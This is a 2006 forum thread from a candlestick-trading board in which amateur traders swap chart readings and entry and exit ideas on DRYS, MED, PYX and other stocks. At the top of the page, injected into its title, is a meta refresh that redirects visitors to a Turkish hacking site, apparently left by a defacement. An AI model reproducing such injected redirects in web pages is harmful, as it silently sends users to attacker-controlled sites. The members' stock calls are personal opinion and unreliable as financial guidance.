Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - drys
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

drys

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Wed Aug 23, 2006 10:46 pm    Post subject: drys Reply with quote

what do u guys make out of the 3 doji on this chart..

cheers
mesa613

PostPosted: Wed Aug 23, 2006 10:58 pm    Post subject: Reply with quote

That's a good one for the old watch list ninner, thanks. I think it looks interesting in that the bears were unable to drive the price lower today, stochs are in the oversold position, and the price remains above the halfway mark of that big candle that formed back on August 2. It needs to break the 20 dma soon though. Just my two cents.

Mesa

P.S. Any thoughts on PYX?
ninner

PostPosted: Wed Aug 23, 2006 11:07 pm    Post subject: drys Reply with quote

if u plot the 30 day moving average on the chart of drys....it has bounced off of it a few times and the dojis are forming right on which could mean that the stock is being supported so i also think its postive but u are right it has to bounce here pretty quick or the bears could gain control. btw im long on drys since about 12.30 so i may add here abit if i get a postive signal.

as for PYX, i think its pretty good i hope u got in today a nice bullish candle with the STO down abit off the overbought area and it broke through a previous resistance point(ie old May highs) Looks good i will be watching that one. Another one for u to watch is BWNG its pulling back nicely here off some nice bullish signals...the last few days has shown some indecision between the bears and bulls...allowing the stochastics to come down abit from their highs.. Im in from about 10.

cheers
rm

PostPosted: Thu Aug 24, 2006 8:05 am    Post subject: Reply with quote

I think DRYS has a few more down days left, I see some possible support around 12.05.

I'll be watching to jump in on this one.

rm
ninner

PostPosted: Fri Aug 25, 2006 10:55 am    Post subject: today Reply with quote

did anyone buy DRYS yesterday.
rm

PostPosted: Mon Aug 28, 2006 1:57 pm    Post subject: Reply with quote

Nope, I missed it......

Still doing great isn't it... Very Happy

I'm still in MED and got in on BG.

I'm still a little leary (= lack of experience) to of gotten in on DRYS after the runup

rm
ninner

PostPosted: Mon Aug 28, 2006 2:47 pm    Post subject: not sure why u are leary Reply with quote

if it turns against you ..just cut your losses ....the goal is to maximize your acct not each trade ...you arent going to get each trade right...thats impossible...i have been in drys for abit here and we are trying to break through 14 ..whcih we may today or at least it is trying too. Have to see what happans...however, med looks good right now...have to see what happans....i usually play the 14 sma and the 28 sma....though....works for me.
mjlewis

PostPosted: Mon Aug 28, 2006 3:02 pm    Post subject: Reply with quote

I did open a position in MED on Thursday 8/24. Friday was certainly gut-wrenching, but I feel much better today. Now back to reading Trading in the Zone, since I clearly have a long way to go in mastering my emotions. Very Happy

On an intellectual level, it's easy for me to remind myself to cut your losses. However, when a stock moves against you almost to your stop loss the very next day after you open a position, it can be pretty nerve-wracking. Exhibit 1 - MED.
ninner

PostPosted: Mon Aug 28, 2006 3:07 pm    Post subject: med Reply with quote

since i dont have time to sit by my computer all day....i would have let the candle on friday play out but it didnt finish below the thursday open so it wouldnt have bothered me that much if it would have closed below thursdays open and then gapped down today i would have probably closed my trade out today or at the opening tomorrow. that is at least my comfort level.....

good luck with it and i will be watching it and keep those stock ideas coming as i will...watch IDTI.....some doji going on there...if it breaks up it may run abit the stochastics look like they are flattening out.
ninner

PostPosted: Tue Aug 29, 2006 10:32 pm    Post subject: Reply with quote

can anyone make anything out of drys...if it gaps down tomorrow i guess may be wise to sell...

cheers
Harry

PostPosted: Wed Aug 30, 2006 9:39 am    Post subject: lower volume Reply with quote

I would get interested in DRYS if it broke above 14.30 on higher volume than the previous days. Until that happens look out below.
rm

PostPosted: Wed Aug 30, 2006 9:37 pm    Post subject: Reply with quote

Hanging men hanging Laughing

rm
ninner

PostPosted: Wed Aug 30, 2006 9:50 pm    Post subject: drys Reply with quote

i didnt likes action the today...it stilll couldnt get past 14.20 so i sold at 14.06...glad i did....it reported earnings that were down from last years.

cheers
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: